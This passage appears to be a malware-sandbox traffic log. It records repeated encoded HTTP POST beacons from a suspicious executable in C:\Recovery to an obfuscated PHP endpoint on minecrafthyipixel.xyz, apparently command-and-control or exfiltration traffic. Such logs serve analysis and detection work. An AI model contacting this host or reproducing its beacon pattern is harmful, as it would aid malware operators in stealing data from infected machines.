                                                                                                                                    Apr 19, 2024 13:43:50.773601055 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:50.878026962 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:50.878290892 CEST2512OUTData Raw: 52 5f 5e 5b 59 44 54 5e 5c 5e 59 59 57 50 58 5f 54 5a 5f 57 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_^[YDT^\^YYWPX_TZ_WT^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%['-=!8 X038%;1W)%9(R285 !>T)(;_",0^/5$[. X
                                                                                                                                    Apr 19, 2024 13:43:51.151772022 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLKtkSnrCXA1DqO72vmrYpjs67tILBKwstd2SCNvxcWvHeeNkxDsUncnhjHMIJsjvARCPp1Z6KLqgh5LwC1%2Ba7nlcp5znW3Q%2FKnWg3fQ%2BPveyOz3b5KFFmqvmlTe8%2BmNIp%2BUOHqh4qk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3a6ade4451a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:51.151835918 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    122192.168.2.449873104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:51.372816086 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:51.477639914 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:51.479341030 CEST2512OUTData Raw: 57 5a 5e 58 5c 43 54 5b 5c 5e 59 59 57 52 58 5a 54 50 5f 5d 54 5f 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^X\CT[\^YYWRXZTP_]T_SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&X"S";,X0;^$.)<19?%+67*V*;^4_.5$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:51.855530977 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POuLXVj5G8qm8Y7X3hhnVUP%2BmiaOz2u8sCpHboiRStQ5rM0phBk6WSvbdeoL87qhxwFOtTjtiWfne0jh%2BuFrwS%2F1Qhzb7FVZucks7TRnh4zjUxbplxP5VfzRjUFFCFkbZEw7Ka2s7Mo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3aa6ef26759-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:51.855607033 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    123192.168.2.449874104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:52.075906992 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:52.180644989 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:52.180787086 CEST2512OUTData Raw: 57 5b 5e 5d 5c 47 51 5e 5c 5e 59 59 57 52 58 5f 54 54 5f 5d 54 5d 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^]\GQ^\^YYWRX_TT_]T]S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_&U"8<\0043.=$%_ S&4!==;\#<.%$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:52.539894104 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:52 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2NU82Pl6btwkHWJmE%2FpYCuOAD5mzYdsxbKL%2B5sB6pf0jJjuuxwW4iP2PWGUuq4Wbm7wwdBumsDIZfhEZNEaoy627vTArLt%2BeHjqWEQQf50BHf2J8w2X%2BPVK9r6R2avOOkb0VmKDfKk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3aec81b672b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:52.539927006 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    124192.168.2.449875104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:52.770729065 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2500
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:52.880300045 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:52.880613089 CEST2500OUTData Raw: 57 54 5e 54 5c 46 51 59 5c 5e 59 59 57 57 58 5b 54 55 5f 5e 54 55 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^T\FQY\^YYWWX[TU_^TUSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&-. ;$08'("?+7\%#&]2P71>T*']#3-5$[. X =
                                                                                                                                    Apr 19, 2024 13:43:53.159071922 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QpQOuPetr%2BV6vIUJI64jKaBgfoccKLM6wJqLXdhI%2FUrRBWGaKazkY8RtGBRz03jZ%2F89GJMSwFf%2BAtvr2srtjtYFS5bgWIDW6VYipv69j3%2BeRGkIelU1iAC9Caai%2B0qyIJKsHijofKyg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3b329a34594-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:53.159133911 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    125192.168.2.449876104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:53.393157959 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:53.498394012 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:53.498696089 CEST2512OUTData Raw: 57 55 5b 5f 5c 47 51 58 5c 5e 59 59 57 5e 58 5c 54 56 5f 5f 54 59 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[_\GQX\^YYW^X\TV__TYSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2>&!8Y$V<3)Q=+&)0U%])711*#^#,+.$[. X
                                                                                                                                    Apr 19, 2024 13:43:53.756548882 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TOldseVmmnhAg%2B1fcD7DXeJyZOeB3tOeolwG%2FBT5gJ%2BS029Jgq5vXyq2NM7eGclMhpjXh8fOifWBmaFPoip1JsRIpx9mle74oupeo2EDUhgSmZubB62%2FVyy%2FzaWi9pCM49dlPFpNx4Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3b70bf744e1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:53.756614923 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    126192.168.2.449877104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:54.271435976 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:54.375962973 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:54.376197100 CEST2512OUTData Raw: 57 5f 5b 5c 59 44 54 54 5c 5e 59 59 57 52 58 58 54 54 5f 5b 54 5a 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[\YDTT\^YYWRXXTT_[TZS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_%X6U";('3[0(-T=(%1;"W!2!++<"<8^:$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:54.642930031 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:54 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKV%2BHaINbVVdc9O4qhhQFgmhYvwpau8R9ncqDZ2ORhbu82fWkYAP4xuP6bK6ObNIN%2BiFHUtzbijVGH1ghBl8Y99u0e59Tp4I1PYLfQDtHOlqop1gyY77Ne%2BTQZ3pAYfFSrjx84G%2Bu6k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3bc8c774505-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:54.642992973 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    127192.168.2.449879104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:56.162867069 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:56.267267942 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:56.267438889 CEST2512OUTData Raw: 52 5e 5b 5e 59 41 54 5e 5c 5e 59 59 57 53 58 5c 54 57 5f 59 54 5a 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[^YAT^\^YYWSX\TW_YTZSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>>V6(]' '[0W>8 19(U2*#2W>;'] /?-$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:56.525645018 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:56 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=op9OTksQMyJFx5fRKiKQfEP8P8eTf13OCSSiNyw6TrqbqQUkWLgv4ViwGN0y4F53GDrXBA5BlYHu71VaVR8f3IdbJou1sJbbyq7kMN3Nv5%2B8zoEaaB2X8qvu6ssu7jiAL%2BFjg9sikN8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3c85d49b085-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:56.525708914 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    128192.168.2.449880104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:56.748488903 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:56.853125095 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:56.853269100 CEST2512OUTData Raw: 57 5a 5e 58 59 47 54 58 5c 5e 59 59 57 50 58 5e 54 5b 5f 5c 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^XYGTX\^YYWPX^T[_\TZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>6U!X'\31=^ '*0V1;*41=);;] /?-$[. X
                                                                                                                                    Apr 19, 2024 13:43:57.207695961 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abwt77A4Cz4Qo8DHI0PdSStkMd2RO2mHLeTbdRIt%2F6kdCnGidjgjNS76OFyr42kngm7ceHOTQ%2FZmeyJCUf%2FddDebVa%2BnUwa%2FzwkZLsu%2BujHpGCOog3k2ZQMICMPMVrXtgIsF7VSyuxw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3cc0a85add7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:57.207758904 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    129192.168.2.449881104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:57.473728895 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:57.578998089 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:57.579149961 CEST2512OUTData Raw: 52 5a 5e 59 5c 40 51 5f 5c 5e 59 59 57 52 58 59 54 5a 5f 58 54 5d 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^Y\@Q_\^YYWRXYTZ_XT]SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%=*V!7$#$%+Q*Y%V%;)7T2)+/\7[-$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:57.841645956 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJ3xoChPYNgEGc2coMnoDpwF8Sz2UxN3UxF0JsrYUiHg3GajUE9grE9fU47qUSWWS0l7rffKp%2B70uDD9Ramni3rb4ZNfxl3nkic4OiMxFz8ceLJUakxqijYTSvfxXiTzq%2BL6kQfQd3g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3d088217bb2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:57.841713905 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    130192.168.2.449882104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:58.070297956 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
